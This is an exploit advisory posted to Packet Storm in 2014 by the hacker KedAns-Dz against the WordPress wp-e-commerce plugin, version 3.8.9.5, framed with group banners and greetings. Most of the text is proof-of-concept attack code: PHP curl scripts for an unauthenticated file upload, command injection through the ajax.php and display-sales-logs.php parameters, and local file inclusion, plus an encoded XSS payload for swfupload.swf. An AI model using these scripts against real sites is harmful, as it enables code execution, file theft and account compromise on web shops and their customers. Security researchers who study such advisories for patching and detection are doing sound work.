WordPress E-Commerce 3.8.9.5 File Upload / XSS / CSRF / Code Execution

2014-01-24T00:00:00
ID PACKETSTORM:124921
Type packetstorm
Reporter KedAns-Dz
Modified 2014-01-24T00:00:00

Description

                                        
                                            `  
###########################################  
#-----------------------------------------#  
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#  
#-----------------------------------------#  
# *----------------------------* #  
# K |....##...##..####...####....| . #  
# h |....#...#........#..#...#...| A #  
# a |....#..#.........#..#....#..| N #  
# l |....###........##...#.....#.| S #  
# E |....#.#..........#..#....#..| e #  
# D |....#..#.........#..#...#...| u #  
# . |....##..##...####...####....| r #  
# *----------------------------* #  
#-----------------------------------------#  
#[ Copyright © 2014 | Dz Offenders Cr3w ]#  
#-----------------------------------------#  
###########################################  
# >> D_x . Made In Algeria . x_Z << #  
######################################################################  
#  
# [>] Title : Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities  
#  
# [>] Author : KedAns-Dz  
# [+] E-mail : ked-h (@hotmail.com)  
# [+] FaCeb0ok : fb.me/K3d.Dz  
# [+] TwiTter : @kedans  
#  
# [#] Platform : PHP / WebApp  
# [+] Cat/Tag : File Upload , Code Exec , File Include , Cross-Site Scripting , Object Inject  
#  
# [<] <3 <3 Greetings t0 Palestine <3 <3  
# [>] ^_^ Greetings to 1337day Users/FAN's and Owners <3 *_* , i'm leaving 1337day  
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls  
#  
######################################################################  
##====[ PoC(1) : File Upload ]================================  
#  
# - CWE : CWE-616 , CWE-434  
#  
# <?php  
# /*  
# - file : save-data.functions.php  
# - lines : 486.. 504  
#  
# line : 500  
#  
# move_uploaded_file( $_FILES['image']['tmp_name'], $new_image_path );  
#   
# */  
#  
# $headers = array("Content-Type: application/octet-stream",  
# "Content-Disposition: form-data; name=\"image\"; file=\"k3d.gif\""); # gif name !  
#  
# $uploadfile="KedAns-Dz TesT !"; # U'r file content h3re !  
#  
# $ch = curl_init("http://[Target]/[path]/wp-e-commerce/wpsc-admin/includes/save-data.functions.php");  
# curl_setopt($ch, CURLOPT_POST, true);  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
# curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
# $postResult = curl_exec($ch);  
# curl_close($ch);  
# print "$postResult";  
# ?>  
#  
##====[ PoC(2) : Remote Code ExeC ]===========================  
#  
# - CWE : CWE-94  
#  
# <?php  
# /*   
# - file : ajax.php  
# - lines : 38 , 41 , 57  
#   
# $callback = "_wpsc_ajax_{$ajax_action}";   
# call_user_func $result = call_user_func($callback);   
# $ajax_action = str_replace('-', '_', $_REQUEST['wpsc_action']);   
#   
# */  
#  
# $ch = curl_init();  
# curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]");  
# curl_setopt($ch, CURLOPT_HTTPGET, 1);  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
# $buf = curl_exec ($ch);  
# curl_close($ch);  
# unset($ch);  
# echo $buf;  
# ?>   
#  
##====[ PoC(3) : Remote Code ExeC ]===========================  
#  
# - CWE : CWE-94  
#  
# <?php  
# /*  
# - file : display-sales-logs.php  
# - line : 23  
#   
# $controller = $_REQUEST['c'];  
#   
# */  
# $ch = curl_init();  
# curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]");  
# curl_setopt($ch, CURLOPT_HTTPGET, 1);  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
# $buf = curl_exec ($ch);  
# curl_close($ch);  
# unset($ch);  
# echo $buf;  
# ?>  
#  
##=====[ PoC(4) Local File Include ]==========================  
#  
# - CWE : CWE-98  
#  
# <?php  
# /*  
# - file: misc.functions.php  
# - lines : 280 .. 355  
#   
# * multiple bug in function imagecreatefromgif() , you can use any param's to exploit it.  
#   
# * param's : [ image_name , category_id , wpsc_request_image , productid , image_id ]  
#   
# */  
#  
# $ch = curl_init();  
# curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI/LFD]");  
# curl_setopt($ch, CURLOPT_HTTPGET, 1);  
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");  
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
# $buf = curl_exec ($ch);  
# curl_close($ch);  
# unset($ch);  
# echo $buf;  
# ?>  
#  
##====[ PoC(5) Remote XSS/XSRF ]==============================  
#  
# - http://1337day.com/exploit/20517  
# - CVE :CVE-2012-2399 , CVE-2012-3414  
# - CWE : CWE-352  
#  
# JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;//  
#  
# http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?movieName=[ JS Code ]  
# http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ]  
#  
###############################################################  
  
####  
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>  
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3  
#---------------------------------------------------------------  
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,  
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &   
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
`